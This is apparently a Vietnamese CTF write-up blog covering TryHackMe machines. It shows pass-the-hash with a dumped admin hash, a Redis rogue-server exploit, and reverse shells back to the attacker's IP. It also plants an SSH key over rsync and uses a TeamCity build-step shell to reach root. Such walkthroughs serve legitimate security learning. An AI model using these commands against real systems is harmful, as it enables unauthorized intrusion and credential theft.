        Wscript.Echo "Password reset for " & strUserNTName
        Wscript.Echo "But, unable to enable account or expire password"
        Wscript.Quit
    End If
End If
On Error GoTo 0

Wscript.Echo "Password reset, account enabled,"
Wscript.Echo "and password expired for user " & strUserNTName

Sử dụng evil-winrm để khai thác window

┌──(kalikali)-[~]
└─$ sudo evil-winrm -i 10.10.24.168 -u a-whitehat -p "bNdKVkjv3RR9ht"
[sudo] password for kali: 

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\a-whitehat\Documents> dir
*Evil-WinRM* PS C:\Users\a-whitehat\Documents> cd \Users
*Evil-WinRM* PS C:\Users> dir


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        12/5/2022   8:57 AM                a-whitehat
d-----        3/13/2021   3:20 PM                Administrator
d-----        3/13/2021   3:42 PM                enterprise-core-vn
d-r---        3/11/2021   7:36 AM                Public


*Evil-WinRM* PS C:\Users> cd enterprise-core-vn\Desktop
*Evil-WinRM* PS C:\Users\enterprise-core-vn\Desktop> dir


    Directory: C:\Users\enterprise-core-vn\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        3/13/2021   3:43 PM             39 user.txt

Privilege escalation

Tôi sẽ thử tìm dump của các user bằng impacket-secretsdump

┌──(kalikali)-[~]
└─$ impacket-secretsdump vulnnet-rst.local/a-whitehat:bNdKVkjv3RR9ht@10.10.24.168
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d:::

Vậy là tôi có hash của admin. Login thử với evil-winrm

┌──(kalikali)-[~]
└─$ evil-winrm -i 10.10.24.168 -u administrator -H "c2597747aa5e43022a3a3049a3c3b09d"

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop/
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        3/13/2021   3:34 PM             39 system.txt

system.txt chính là root-flag.

Tryhackme - VulnNet: Internal

in CTF on Tryhackme, SMB, Linux, Mount, Redis, Rsync, Teamcity, SSH, Ssh-key
  1. Reconnaissance
  2. RCE
  3. User flag
  4. Privilege escalation
    1. SSH

intro

Xin chào, lại là tôi đây. Hôm nay tôi sẽ giải CTF TryHackMe | VulnNet: Internal

Reconnaissance

Vẫn như thông thường, việc đầu tiên cần làm quét các cổng đang mở trên máy chủ mục tiêu.

PORT      STATE SERVICE     REASON  VERSION
22/tcp    open  ssh         syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5e278f48ae2ff889bb8913e39afd6340 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDagA3GVO7hKpJpO1Vr6+z3Y9xjoeihZFWXSrBG2MImbpPH6jk+1KyJwQpGmhMEGhGADM1LbmYf3goHku11Ttb0gbXaCt+mw1Ea+K0H00jA0ce2gBqev+PwZz0ysxCLUbYXCSv5Dd1XSa67ITSg7A6h+aRfkEVN2zrbM5xBQiQv6aBgyaAvEHqQ73nZbPdtwoIGkm7VL9DATomofcEykaXo3tmjF2vRTN614H0PpfZBteRpHoJI4uzjwXeGVOU/VZcl7EMBd/MRHdspvULJXiI476ID/ZoQLT2zQf5Q2vqI3ulMj5CB29ryxq58TVGSz/sFv1ZBPbfOl9OvuBM5BTBV
|   256 f4fe0be25c88b563138550ddd586abbd (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNM0XfxK0hrF7d4C5DCyQGK3ml9U0y3Nhcvm6N9R+qv2iKW21CNEFjYf+ZEEi7lInOU9uP2A0HZG35kEVmuideE=
|   256 82ea4885f02a237e0ea9d9140a602fad (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJPRO3XCBfxEo0XhViW8m/V+IlTWehTvWOyMDOWNJj+i
111/tcp   open  rpcbind     syn-ack 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      38730/udp6  mountd
|   100005  1,2,3      40715/tcp6  mountd
|   100005  1,2,3      49113/tcp   mountd
|   100005  1,2,3      51452/udp   mountd
|   100021  1,3,4      42359/tcp6  nlockmgr
|   100021  1,3,4      43398/udp6  nlockmgr
|   100021  1,3,4      43415/tcp   nlockmgr
|   100021  1,3,4      49938/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
139/tcp   open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn syn-ack Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
873/tcp   open  rsync       syn-ack (protocol version 31)
2049/tcp  open  nfs_acl     syn-ack 3 (RPC #100227)
6379/tcp  open  redis       syn-ack Redis key-value store
43415/tcp open  nlockmgr    syn-ack 1-4 (RPC #100021)
49113/tcp open  mountd      syn-ack 1-3 (RPC #100005)
51197/tcp open  mountd      syn-ack 1-3 (RPC #100005)
60935/tcp open  mountd      syn-ack 1-3 (RPC #100005)
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time: 
|   date: 2022-11-23T02:16:00
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 23538/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 60791/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 27828/udp): CLEAN (Failed to receive data)
|   Check 4 (port 56651/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: -19m58s, deviation: 34m37s, median: 0s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: vulnnet-internal
|   NetBIOS computer name: VULNNET-INTERNAL\x00
|   Domain name: \x00
|   FQDN: vulnnet-internal
|_  System time: 2022-11-23T03:16:00+01:00
| nbstat: NetBIOS name: VULNNET-INTERNA, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| Names:
|   VULNNET-INTERNA<00>  Flags: <unique><active>
|   VULNNET-INTERNA<03>  Flags: <unique><active>
|   VULNNET-INTERNA<20>  Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   0000000000000000000000000000000000
|   0000000000000000000000000000000000
|_  0000000000000000000000000000

Tôi sẽ bắt đầu với smb - port 139, 445. Đầu tiên kiểm tra share folders

┌──(kalikali)-[~]
└─$ smbmap -H 10.10.118.210
[+] Guest session       IP: 10.10.118.210:445   Name: 10.10.118.210                                     
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        shares                                                  READ ONLY       VulnNet Business Shares
        IPC$                                                    NO ACCESS       IPC Service (vulnnet-internal server (Samba, Ubuntu))

Truy cập vào thư mục shares

┌──(kalikali)-[~]
└─$ smbclient \\\\10.10.118.210\\shares
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Tue Feb  2 04:20:09 2021
  ..                                  D        0  Tue Feb  2 04:28:11 2021
  temp                                D        0  Sat Feb  6 06:45:10 2021
  data                                D        0  Tue Feb  2 04:27:33 2021

                11309648 blocks of size 1024. 3279224 blocks available
smb: \> cd temp
smb: \temp\> dir
  .                                   D        0  Sat Feb  6 06:45:10 2021
  ..                                  D        0  Tue Feb  2 04:20:09 2021
  services.txt                        N       38  Sat Feb  6 06:45:09 2021

                11309648 blocks of size 1024. 3279684 blocks available
smb: \temp\> get services.txt /home/kali/
Error opening local file /home/kali/           
smb: \temp\> scopy services.txt /home/kali/
Failed to create file \temp\home\kali\. NT_STATUS_OBJECT_PATH_NOT_FOUND
smb: \temp\> get services.txt 
getting file \temp\services.txt of size 38 as services.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \temp\> 
smb: \temp\> cd ..
smb: \> ls
  .                                   D        0  Tue Feb  2 04:20:09 2021
  ..                                  D        0  Tue Feb  2 04:28:11 2021
  temp                                D        0  Sat Feb  6 06:45:10 2021
  data                                D        0  Tue Feb  2 04:27:33 2021

                11309648 blocks of size 1024. 3277876 blocks available
smb: \> cd data
smb: \data\> ls
  .                                   D        0  Tue Feb  2 04:27:33 2021
  ..                                  D        0  Tue Feb  2 04:20:09 2021
  data.txt                            N       48  Tue Feb  2 04:21:18 2021
  business-req.txt                    N      190  Tue Feb  2 04:27:33 2021

                11309648 blocks of size 1024. 3277852 blocks available
smb: \data\> get data.txt 
getting file \data\data.txt of size 48 as data.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \data\> get business-req.txt 
getting file \data\business-req.txt of size 190 as business-req.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \data\>

Mở file services.txt trên máy local tôi sẽ có được flag đầu tiên.

Với 2 file còn lại tôi được 2 lời nhắn

┌──(kalikali)-[~]
└─$ cat data.txt  
Purge regularly data that is not needed anymore
                                  
┌──(kalikali)-[~]
└─$ cat business-req.txt 
We just wanted to remind you that were waiting for the DOCUMENT you agreed to send us so we can complete the TRANSACTION we discussed.
If you have any questions, please text or phone us.
                                     
┌──(kalikali)-[~]
└─$

Không còn gì để khai thác với 2 port này, tôi sẽ chuyển sang mount

RCE

┌──(kalikali)-[~]
└─$ showmount -e 10.10.116.142                                           
Export list for 10.10.116.142:
/opt/conf *
┌──(kalikali)-[~]
└─$ sudo mount -t nfs 10.10.116.142:/opt/conf /home/kali/THM-Vulnet -o nolock
┌──(kalikali)-[~]
└─$ tree THM-Vulnet 
THM-Vulnet
├── hp
│   └── hplip.conf
├── init
│   ├── anacron.conf
│   ├── lightdm.conf
│   └── whoopsie.conf
├── opt
├── profile.d
│   ├── bash_completion.sh
│   ├── cedilla-portuguese.sh
│   ├── input-method-config.sh
│   └── vte-2.91.sh
├── redis
│   └── redis.conf
├── vim
│   ├── vimrc
│   └── vimrc.tiny
└── wildmidi
    └── wildmidi.cfg

7 directories, 12 files
                                     
┌──(kalikali)-[~]
└─$

Tôi sẽ tập trung phân tích redis trước vì tôi thấy có service ở phía trên, có thể khai thác được gì đó, cái gì đó ở đây có thể password để truy cập vào service này. Tôi thử tìm “pass” và đã có kết quả

pass-redis

Bây giờ thì thử tìm kiếm các cách khai thác với redis

6379 - Pentesting Redis - HackTricks

Sử dụng Redis Rogue Server để tạo RCE

┌──(kalikali)-[~/redis-rogue-server]
└─$ python redis-rogue-server.py --rhost 10.10.116.142 --lhost 10.6.0.191 --lport 2402 --passwd B65Hx562F@ggAZ@F
______         _ _      ______                         _____                          
| ___ \       | (_)     | ___ \                       /  ___|                         
| |_/ /___  __| |_ ___  | |_/ /___   __ _ _   _  ___  \ `--.  ___ _ ____   _____ _ __ 
|    // _ \/ _` | / __| |    // _ \ / _` | | | |/ _ \  `--. \/ _ \ '__\ \ / / _ \ '__|
| |\ \  __/ (_| | \__ \ | |\ \ (_) | (_| | |_| |  __/ /\__/ /  __/ |   \ V /  __/ |   
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_|    \_/ \___|_|   
                                     __/ |                                            
                                    |___/                                             
@copyright n0b0dy @ r3kapig

[info] TARGET 10.10.116.142:6379
[info] SERVER 10.6.0.191:2402
[info] Setting master...
[info] Authenticating...
[info] Setting dbfilename...
[info] Loading module...
[info] Temerory cleaning up...
What do u want, [i]nteractive shell or [r]everse shell: r
[info] Open reverse shell...
Reverse server address:

Đến bước này, trước khi nhập address, tôi sẽ tạo listener với port 9001

nc -lnvp 9001

Sau đó thì nhập IP và port của máy local của tôi

Reverse server address: 10.6.0.191
Reverse server port: 9001
[info] Reverse shell payload sent.
[info] Check at 10.6.0.191:9001
[info] Unload module...

Quay trở lại listener

┌──(kalikali)-[~]
└─$ nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.6.0.191] from (UNKNOWN) [10.10.116.142] 53768
id
uid=112(redis) gid=123(redis) groups=123(redis)

User flag

Để đỡ mất thời gian thì tôi quyết định tải linPEAS lên machine.

Tạo local http server ở thư mục chứa file linpeas.sh

┌──(kalikali)-[~]
└─$ python -m http.server 9001
Serving HTTP on 0.0.0.0 port 9001 (http://0.0.0.0:9001/) ...

Thư mục /tmp có toàn quyền thực thi nên tôi sẽ tải file lên thư mục này, thay đổi quyền và chạy nó

redis@vulnnet-internal:/$ cd tmp
cd tmp
redis@vulnnet-internal:/tmp$ wget http://10.6.0.191:9001/linpeas.sh
wget http://10.6.0.191:9001/linpeas.sh
--2022-11-23 09:04:33--  http://10.6.0.191:9001/linpeas.sh
Connecting to 10.6.0.191:9001... 
connected.
HTTP request sent, awaiting response... 
200 OK
Length: 827827 (808K) [text/x-sh]
Saving to: 'linpeas.sh'

linpeas.sh          100%[===================>] 808.42K   355KB/s    in 2.3s    

2022-11-23 09:04:36 (355 KB/s) - 'linpeas.sh' saved [827827/827827]

redis@vulnnet-internal:/tmp$ 
redis@vulnnet-internal:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
redis@vulnnet-internal:/tmp$ ./linpeas.sh

Quay lại 1 chút thông tin về máy này thì ở phần hint của flag thứ 2 chỉ ra rằng flag nằm trong 1 file db. Sau khi linpeas chạy xong thì tôi để ý thấy có 1 file rdb bên trong redis

╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files                                                                                                            
  Group redis:                                                                                                                                                                               
/tmp/linpeas.sh                                                                                                                                                                              
/run/redis/redis-server.pid
/var/log/redis/redis-server.log.1.gz
/var/log/redis/redis-server.log
/var/lib/redis/dump.rdb

Mở file này thì tôi có flag thứ 2 và 1 public key

Tuy nhiên cũng ở file này, tôi để ý thấy có 1 đoạn code khá lạ, có thể là base64

code

Sau 1 lúc thử cho đúng format của đoạn code này thì tôi đã decrypt được

Nó ở đây

Nhớ rằng bên trên cũng có rsync với port 873. Tôi quay trở lại Book Hacktrick để tìm cách khai thác.

Sử dụng metasploit tôi tìm được file share là files

msf6 auxiliary(scanner/rsync/modules_list) > run

[+] 10.10.116.142:873     - 1 rsync modules found: files
[*] 10.10.116.142:873     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/rsync/modules_list) >

Bây giờ thử rsync như hướng dẫn, thử với password vừa tìm được ở CyberChef phía trên

┌──(kalikali)-[~]
└─$ rsync -av --list-only rsync://rsync-connect@10.10.116.142/files

Nó list ra tất cả các file có trong thư mục share này, tất nhiên là quá dài nên tôi sẽ không ghi vào đây. Để đọc được các file này, tôi phải clone nó về máy local

┌──(kalikali)-[~]
└─$ rsync -av rsync://rsync-connect@10.10.116.142/files /home/kali/rsync

Quay lại máy local

┌──(kalikali)-[~/rsync/sys-internal]
└─$ ll
total 36
drwx------ 2 kali kali 4096 Feb  1  2021 Desktop
drwxr-xr-x 2 kali kali 4096 Feb  1  2021 Documents
drwxr-xr-x 2 kali kali 4096 Feb  1  2021 Downloads
drwxr-xr-x 2 kali kali 4096 Feb  1  2021 Music
drwxr-xr-x 2 kali kali 4096 Feb  1  2021 Pictures
drwxr-xr-x 2 kali kali 4096 Feb  1  2021 Public
drwxr-xr-x 2 kali kali 4096 Feb  1  2021 Templates
-rw------- 1 kali kali   38 Feb  6  2021 user.txt
drwxr-xr-x 2 kali kali 4096 Feb  1  2021 Videos

Vậy là tôi tìm được user-flag

Privilege escalation

Quay trở lại phần list file ở phía trên để xem cho dễ, tôi nhận ra có thư mục .ssh, nhưng bên trong không có gì.

Vậy thì tôi sẽ thử tải public key của mình lên máy để login ssh

┌──(kalikali)-[~/rsync]
└─$ cp ~/.ssh/id_rsa.pub authorized_keys
                                         
┌──(kalikali)-[~/rsync]
└─$ rsync authorized_keys rsync://rsync-connect@10.10.116.142/files/sys-internal/.ssh   
Password:

SSH

┌──(kalikali)-[~/rsync]
└─$ ssh sys-internal@10.10.116.142    
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

541 packages can be updated.
342 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

sys-internal@vulnnet-internal:~$ id
uid=1000(sys-internal) gid=1000(sys-internal) groups=1000(sys-internal),24(cdrom)

Tuy nhiên sau khi dạo quanh 1 vòng tôi cũng không tìm được gì quá đặc biệt. Mất 1 lúc khá lâu để ngồi xem lại từ đầu xem tôi có bỏ sót gì không, quay ngược lại RCE ban đầu tôi nhận ra còn 1 thư mục khá thú vị mà tôi đã bỏ qua đó là TeamCity

redis@vulnnet-internal:/$ ls -la
ls -la
total 533816
drwxr-xr-x  24 root root      4096 Feb  6  2021 .
drwxr-xr-x  24 root root      4096 Feb  6  2021 ..
drwx------   2 root root      4096 Feb  1  2021 .cache
drwxr-xr-x  12 root root      4096 Feb  6  2021 TeamCity
drwxr-xr-x   2 root root      4096 Feb  2  2021 bin
drwxr-xr-x   3 root root      4096 Feb  1  2021 boot
drwxr-xr-x   6 root root       380 Nov 23 07:20 dev
drwxr-xr-x 129 root root     12288 Feb  7  2021 etc
d---------   2 root root        40 Nov 23 07:20 home
lrwxrwxrwx   1 root root        34 Feb  1  2021 initrd.img -> boot/initrd.img-4.15.0-135-generic
lrwxrwxrwx   1 root root        33 Feb  1  2021 initrd.img.old -> boot/initrd.img-4.15.0-20-generic
drwxr-xr-x  18 root root      4096 Feb  1  2021 lib
drwxr-xr-x   2 root root      4096 Feb  1  2021 lib64
drwx------   2 root root     16384 Feb  1  2021 lost+found
drwxr-xr-x   4 root root      4096 Feb  2  2021 media
drwxr-xr-x   2 root root      4096 Feb  1  2021 mnt
drwxr-xr-x   4 root root      4096 Feb  2  2021 opt
dr-xr-xr-x 133 root root         0 Nov 23 07:20 proc
d---------   2 root root        40 Nov 23 07:20 root
drwxr-xr-x  27 root root       860 Nov 23 07:25 run
drwxr-xr-x   2 root root      4096 Feb  2  2021 sbin
drwxr-xr-x   2 root root      4096 Feb  1  2021 srv
-rw-------   1 root root 546529280 Feb  1  2021 swapfile
dr-xr-xr-x  13 root root         0 Nov 23 08:50 sys
drwxrwxrwt   2 root root      4096 Nov 23 09:05 tmp
drwxr-xr-x  10 root root      4096 Feb  1  2021 usr
drwxr-xr-x  13 root root      4096 Feb  1  2021 var
lrwxrwxrwx   1 root root        31 Feb  1  2021 vmlinuz -> boot/vmlinuz-4.15.0-135-generic
lrwxrwxrwx   1 root root        30 Feb  1  2021 vmlinuz.old -> boot/vmlinuz-4.15.0-20-generic

Đây là 1 phần mềm giúp thiết lập máy chủ cho các dự án cũng như tích hợp các công cụ để phát triển dự án

Thằng này có cổng mặc định là 8111, và khi kiểm tra các service đang chạy trên đây thì tôi cũng thấy có 8111

redis@vulnnet-internal:/$ ss -ltp
ss -ltp
Cannot open netlink socket: Address family not supported by protocol
State  Recv-Q  Send-Q         Local Address:Port             Peer Address:Port                                                                                  
LISTEN 0       0                    0.0.0.0:45863                 0.0.0.0:*                                                                                     
LISTEN 0       0                    0.0.0.0:rsync                 0.0.0.0:*                                                                                     
LISTEN 0       0                    0.0.0.0:netbios-ssn           0.0.0.0:*                                                                                     
LISTEN 0       0                    0.0.0.0:6379                  0.0.0.0:*      users:(("ss",pid=19207,fd=6),("bash",pid=2072,fd=6),("python",pid=2071,fd=6),("sh",pid=538,fd=6))
LISTEN 0       0                    0.0.0.0:36171                 0.0.0.0:*                                                                                     
LISTEN 0       0                    0.0.0.0:sunrpc                0.0.0.0:*                                                                                     
LISTEN 0       0                 127.0.0.53:domain                0.0.0.0:*                                                                                     
LISTEN 0       0                    0.0.0.0:ssh                   0.0.0.0:*                                                                                     
LISTEN 0       0                  127.0.0.1:ipp                   0.0.0.0:*                                                                                     
LISTEN 0       0                    0.0.0.0:microsoft-ds          0.0.0.0:*                                                                                     
LISTEN 0       0                    0.0.0.0:nfs                   0.0.0.0:*                                                                                     
LISTEN 0       0                    0.0.0.0:36545                 0.0.0.0:*                                                                                     
LISTEN 0       0                    0.0.0.0:47331                 0.0.0.0:*                                                                                     
LISTEN 0       0         [::ffff:127.0.0.1]:56551                       *:*                                                                                     
LISTEN 0       0         [::ffff:127.0.0.1]:8105                        *:*                                                                                     
LISTEN 0       0                          *:rsync                       *:*                                                                                     
LISTEN 0       0                      [::1]:6379                        *:*      users:(("ss",pid=19207,fd=7),("bash",pid=2072,fd=7),("python",pid=2071,fd=7),("sh",pid=538,fd=7))
LISTEN 0       0                          *:34283                       *:*                                                                                     
LISTEN 0       0                          *:netbios-ssn                 *:*                                                                                     
LISTEN 0       0                          *:55021                       *:*                                                                                     
LISTEN 0       0         [::ffff:127.0.0.1]:8111                        *:*                                                                                     
LISTEN 0       0                          *:sunrpc                      *:*                                                                                     
LISTEN 0       0                          *:36497                       *:*                                                                                     
LISTEN 0       0                          *:43635                       *:*                                                                                     
LISTEN 0       0                          *:ssh                         *:*                                                                                     
LISTEN 0       0                      [::1]:ipp                         *:*                                                                                     
LISTEN 0       0                          *:microsoft-ds                *:*                                                                                     
LISTEN 0       0                          *:nfs                         *:*                                                                                     
LISTEN 0       0                          *:9090                        *:*                                                                                     
LISTEN 0       0                          *:37411                       *:*

Sử dụng SSH để chuyển tiếp kết nối với port 8111

┌──(kalikali)-[~]
└─$ ssh -L 8111:127.0.0.1:8111 sys-internal@10.10.116.142
bind [127.0.0.1]:8111: Address already in use
channel_setup_fwd_listener_tcpip: cannot listen to port: 8111
Could not request local forwarding.
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

541 packages can be updated.
342 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Wed Nov 23 11:25:55 2022 from 10.6.0.191
sys-internal@vulnnet-internal:~$

Truy cập 127.0.0.1:8111

web

Vào as a Super user:

super-user

Điều này có nghĩa là tôi cần token để login. Và việc đầu tiên tôi nghĩ đến là tìm nó bên trong log, vì có thể những phiên đăng nhập trước đó vẫn còn ghi lại trong log.

Tìm từ khóa token bên trong tất cả các file tại thư mục /logs

sys-internal@vulnnet-internal:/TeamCity$ grep -iR token /TeamCity/logs/ 2>/dev/null
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 3782562599667957776 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 1189775395164371106 (use empty username with the token as the password to access the server)

Với token cuối cùng thì tôi đã tìm đăng nhập thành công. Hiện tại tôi đang truy cập với root, có nghĩa là tôi có thể toàn quyền sử dụng TeamCity và sẽ tìm cách để RCE

Sau khi mất 1 thời gian tương đối để tìm hiểu thêm về TeamCity, tôi đã tìm được cách lấy RCE. Đầu tiên vẫn phải tạo 1 project mới, sau đó chọn Buil Step với command line và nhập payload vào Custom script, nó sẽ giống như thế này

RCE

Sau đó save nó lại. Tiếp theo tạo listener với port đã thêm trong payload, ở đây tôi dùng port 9001

nc -lnvp 9001

Sau khi đã save xong, tôi chọn Run ở cửa sổ tiếp theo

run

Quay trở lại listener

┌──(kalikali)-[~]
└─$ nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.6.0.191] from (UNKNOWN) [10.10.211.50] 49704
root@vulnnet-internal:/TeamCity/buildAgent/work/2b35ac7e0452d98f# id   
id
uid=0(root) gid=0(root) groups=0(root)
root@vulnnet-internal:/TeamCity/buildAgent/work/2b35ac7e0452d98f# 
root@vulnnet-internal:/TeamCity/buildAgent/work/2b35ac7e0452d98f# cd
cd
root@vulnnet-internal:~# ls /root
ls /root
root.txt
root@vulnnet-internal:~#

Tryhackme - Cat Pictures

in CTF on Tryhackme, Web, Linux, FTP, SSH, Docker
  1. Reconnaissance
  2. SSH
  3. Privilege escalation

intro

Xin chào, lại là tôi đây. Hôm nay tôi sẽ giải CTF TryHackMe | Cat Pictures

Reconnaissance

Vẫn như thông thường, việc đầu tiên cần làm quét các cổng đang mở trên máy chủ mục tiêu

PORT     STATE SERVICE      REASON  VERSION
21/tcp   open  ftp          syn-ack vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 ftp      ftp           162 Apr 02  2021 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.6.0.191
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh          syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 37436480d35a746281b7806b1a23d84a (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDIDEV5ShmazmTw/1A6+19Bz9t3Aa669UOdJ6wf+mcv3vvJmh6gC8V8J58nisEufW0xnT69hRkbqrRbASQ8IrvNS8vNURpaA0cycHDntKA17ukX0HMO7AS6X8uHfIFZwTck5v6tLAyHlgBh21S+wOEqnANSms64VcSUma7fgUCKeyJd5lnDuQ9gCnvWh4VxSNoW8MdV64sOVLkyuwd0FUTiGctjTMyt0dYqIUnTkMgDLRB77faZnMq768R2x6bWWb98taMT93FKIfjTjGHV/bYsd/K+M6an6608wMbMbWz0pa0pB5Y9k4soznGUPO7mFa0n64w6ywS7wctcKngNVg3H
|   256 53c682efd27733efc13d9c1513540eb2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCs+ZcCT7Bj2uaY3QWJFO4+e3ndWR1cDquYmCNAcfOTH4L7lBiq1VbJ7Pr7XO921FXWL05bAtlvY1sqcQT6W43Y=
|   256 ba97c323d4f2cc082ce12b3006189541 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGq9I/445X/oJstLHIcIruYVdW4KqIFZks9fygfPkkPq
4420/tcp open  nvm-express? syn-ack
| fingerprint-strings: 
|   DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, RTSPRequest: 
|     INTERNAL SHELL SERVICE
|     please note: cd commands do not work at the moment, the developers are fixing it at the moment.
|     ctrl-c
|     Please enter password:
|     Invalid password...
|     Connection Closed
|   NULL, RPCCheck: 
|     INTERNAL SHELL SERVICE
|     please note: cd commands do not work at the moment, the developers are fixing it at the moment.
|     ctrl-c
|_    Please enter password:
8080/tcp open  http         syn-ack Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1d PHP/7.3.27
|_http-title: Cat Pictures - Index page
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS

Với ftp port 21, tôi có user Anonymous có 1 file tên note.txt. Truy cập vào nó để lấy file này về

┌──(kalikali)-[~]
└─$ ftp 10.10.107.28
Connected to 10.10.107.28.
220 (vsFTPd 3.0.3)
